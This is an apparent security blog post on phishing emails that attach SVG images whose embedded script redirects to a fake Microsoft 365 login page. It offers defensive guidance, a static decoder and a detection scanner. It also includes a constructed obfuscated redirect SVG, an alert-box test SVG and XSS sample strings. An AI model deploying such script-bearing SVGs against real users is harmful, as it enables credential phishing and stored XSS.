The threat of SVG files
As recently covered by RiskyBiz, attackers sending phishing emails have suddenly discovered what can be done by attaching malicious SVG images. We saw this with a customer last week, so I thought it worth a quick blog.
In our case, five of the more prominent users from one customer organisation all received similar emails, which purport to be a TODO message to themselves, with no body content but with an SVG attached:
The email fails DMARC and SPF checks, so it should end up in Junk or Quarantine for users with a decent defensive configuration.
If the user clicks on the SVG from the email, it will typically open in the default browser. The image then renders, the embedded script executes, and the user is redirected to a fake Microsoft 365 login page:
When we tested it, it also showed a CAPTCHA-style loading check first.
The script itself is only about ten lines long and uses some string obfuscation shenanigans: String.fromCharCode decodes a long list of numeric character codes into the redirect URL, which keeps the malicious domain out of the script in plaintext and out of reach of naive string matching.
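To show what that obfuscation looks like and how to undo it without running the attacker's code, here is an added example (it is not the script from the phishing email, nor code from the original post). The SVG below is constructed for this example, the domain login.example.com is a placeholder, and the decoder recovers the URL statically by pulling the numeric lists out of the text and converting them back to characters.

```javascript
// Added example (not from the original post): statically decode the
// String.fromCharCode obfuscation used in malicious SVG scripts so the
// redirect target can be recovered without executing the script.
// The SVG below is constructed for this example; the hostname is a placeholder.
const sampleSvg = `<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124">
<rect width="124" height="124" rx="24" fill="#000000"/>
<script><![CDATA[
var codes = "104,116,116,112,115,58,47,47,108,111,103,105,110,46,101,120,97,109,112,108,101,46,99,111,109,47,63,117,61";
var p = String.fromCharCode(108,111,99,97,116,105,111,110);
var url = String.fromCharCode.apply(null, codes.split(","));
window[p] = url + encodeURIComponent(window[p].href);
]]></script>
</svg>`;

// Find every list of numeric character codes in the script text and decode it.
// Two shapes are handled: literal arguments to String.fromCharCode(...), and a
// quoted delimiter-separated list of numbers that the script splits at runtime.
function decodeCharCodeLists(text) {
  const found = [];
  const direct = /String\.fromCharCode\s*\(\s*([\d\s,]+)\)/g;
  const quoted = /["']((?:\d{1,3}[,\-\s|;]+)+\d{1,3})["']/g;
  for (const re of [direct, quoted]) {
    let m;
    while ((m = re.exec(text)) !== null) {
      const codes = m[1].split(/[^\d]+/).filter(Boolean).map(Number);
      // Attacker strings here are URLs and identifiers, so insist on printable
      // ASCII; this also rejects things like viewBox="0 0 124 124".
      if (codes.length >= 4 && codes.every(c => c >= 32 && c <= 126)) {
        found.push(String.fromCharCode(...codes));
      }
    }
  }
  return found;
}

// Pull hostnames out of the decoded strings: these are the indicators to block.
function extractHosts(strings) {
  const hosts = new Set();
  for (const s of strings) {
    for (const m of s.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) hosts.add(m[1].toLowerCase());
  }
  return [...hosts];
}

const decoded = decodeCharCodeLists(sampleSvg);
console.log(decoded);               // ["location", "https://login.example.com/?u="]
console.log(extractHosts(decoded)); // ["login.example.com"]
```

This only recovers lists that are written out as literals. If the codes are produced arithmetically (each value XORed or offset at runtime, say), static decoding comes back empty and the script needs to be run in a sandboxed browser or a JavaScript interpreter with network access disabled.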
SVG technical details
As Adam Boileau said in last week’s Risky Biz podcast :
SVG is to images what HTML is to text…all the functionality of HTML…a whole web document format that happens to be for images.
Vector graphics don't need to support embedded scripts, but we've landed on SVG as the default, so we need to deal with them. We can blame Big Vector Graphics lobbying, presumably.
It's trivial to make a test image; here's one with a rounded rectangle, plus some JavaScript to pop an alert box:
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
<rect width="124" height="124" rx="24" fill="#000000"/>
<script type="text/javascript">
alert(0x539);
</script>
</svg>
Open it in a browser and you get an alert box:
We routinely check for sensible handling of SVG files in any upload functionality in a web app pen-test. As ever, the big danger is from untrusted user content: an uploaded SVG served back from the application's own origin with Content-Type: image/svg+xml is a stored XSS for anyone who opens it directly. One caveat worth knowing: browsers do not run scripts in an SVG loaded via an <img> element or a CSS background. The script runs when the file is opened as a document in its own right (which is exactly what happens when you open an attachment) or when it is embedded via <object> or <iframe>.
Detection and prevention of malicious SVG files
From a technical perspective it's easy to spot script content in SVG files: look for <script> elements, but also for on* event-handler attributes (onload, onclick and friends) and javascript: URLs in href attributes, both of which run script without any <script> tag. And given the whole file is text, you can even open one in Notepad.
The easiest approach to defence is outright blocking, but any tool or application inspecting SVG content should be able to spot and remove script. Pattern matching on the raw text is fine for triage; for sanitising files you intend to keep, parse the XML and rebuild it from an allow-list of safe elements and attributes instead.
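As an added example (not tooling from the original post), here is a small triage scanner that runs the checks just described over SVG text and reports where each piece of active content sits. The sample files are constructed for this example and the hostname is a placeholder; the page's own rounded-rectangle image is the benign case.

```javascript
// Added example (not from the original post): triage scanner for the ways an
// SVG can carry active content. Regex-based, so it is for detection and
// triage rather than sanitisation. Sample inputs below are constructed.
const CHECKS = [
  // <script> elements, including ones wrapping their body in CDATA. Matched
  // case-insensitively: an SVG parsed as HTML treats <SCRIPT> as script too.
  { name: "script-element",          re: /<script\b/gi },
  // on* event-handler attributes (onload, onclick, onbegin, ...) run script
  // with no <script> element at all.
  { name: "event-handler-attribute", re: /\s(on[a-z]+)\s*=/gi },
  // javascript: URLs in href / xlink:href, e.g. <a href="javascript:...">
  { name: "javascript-url",          re: /(?:xlink:)?href\s*=\s*["']\s*javascript:/gi },
  // <foreignObject> lets arbitrary HTML (iframes, forms) ride inside the SVG.
  { name: "foreignObject",           re: /<foreignObject\b/gi },
  // Remote references fetched on render (tracking, or loading a remote file).
  { name: "external-reference",      re: /(?:xlink:)?href\s*=\s*["']\s*https?:\/\//gi },
];

// Return one finding per match: which check fired, the byte offset and the text.
function scanSvg(svgText) {
  const findings = [];
  for (const { name, re } of CHECKS) {
    re.lastIndex = 0;
    let m;
    while ((m = re.exec(svgText)) !== null) {
      findings.push({ check: name, at: m.index, match: m[0].trim() });
    }
  }
  return findings;
}

function isSuspicious(svgText) {
  return scanSvg(svgText).length > 0;
}

// Constructed samples (the hostname is a placeholder).
const benign = `<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
<rect width="124" height="124" rx="24" fill="#000000"/>
</svg>`;
const withScript = `<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/>
<script><![CDATA[ window.location = "https://login.example.com/"; ]]></script></svg>`;
const withHandler = `<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><rect width="10" height="10"/></svg>`;
const withJsHref = `<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<a xlink:href="javascript:alert(1)"><text y="20">Sign in</text></a></svg>`;

for (const [label, svg] of [["benign", benign], ["script", withScript], ["onload", withHandler], ["js-href", withJsHref]]) {
  console.log(label, isSuspicious(svg) ? "SUSPICIOUS" : "clean", scanSvg(svg));
}
```

The regexes are deliberately greedy, so expect the odd false positive (a word starting "on" followed by an equals sign in visible text, for instance); that is the right trade-off for a filter that quarantines for human review. They will also miss things a real parser would not, such as entity-encoded attribute values, which is why the sanitising step, as opposed to the detecting step, should work on the parsed XML and keep only allow-listed elements and attributes.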
Email applications
The strongest measure is to configure your email protections (e.g. Microsoft 365, Mimecast, Proofpoint or whatever) to block SVG files. For example, in Microsoft 365 you can add additional file extensions to the Common Attachment Filter admin page (which is in the Anti-Malware threat policies page, not the Safe Attachments one).
Blocking them outright may cause issues if you're working with external designers or website people, who do like to use them because they scale cleanly to any size. But that's where apps like Hexiosec Transfer make it easy to send big files on request, without having to deal with email attachments (although end-to-end encryption means we can't inspect sent files for badness).
Web applications
Many web applications that accept image uploads won't accept SVG files, and will block the upload based on the file extension. If you do accept them, inspect the content: the above examples show how easy it is to spot script, and while you can obfuscate the JavaScript, it still has to sit somewhere the browser will execute it, i.e. a <script> element, an on* event-handler attribute such as onload, or a javascript: URL in an href. Strip all of those (or better, rebuild the file from an allow-list of safe elements and attributes) before storing it, and serve user-supplied SVGs from a separate origin or with Content-Disposition: attachment, so that anything which slips through can't run in your application's origin.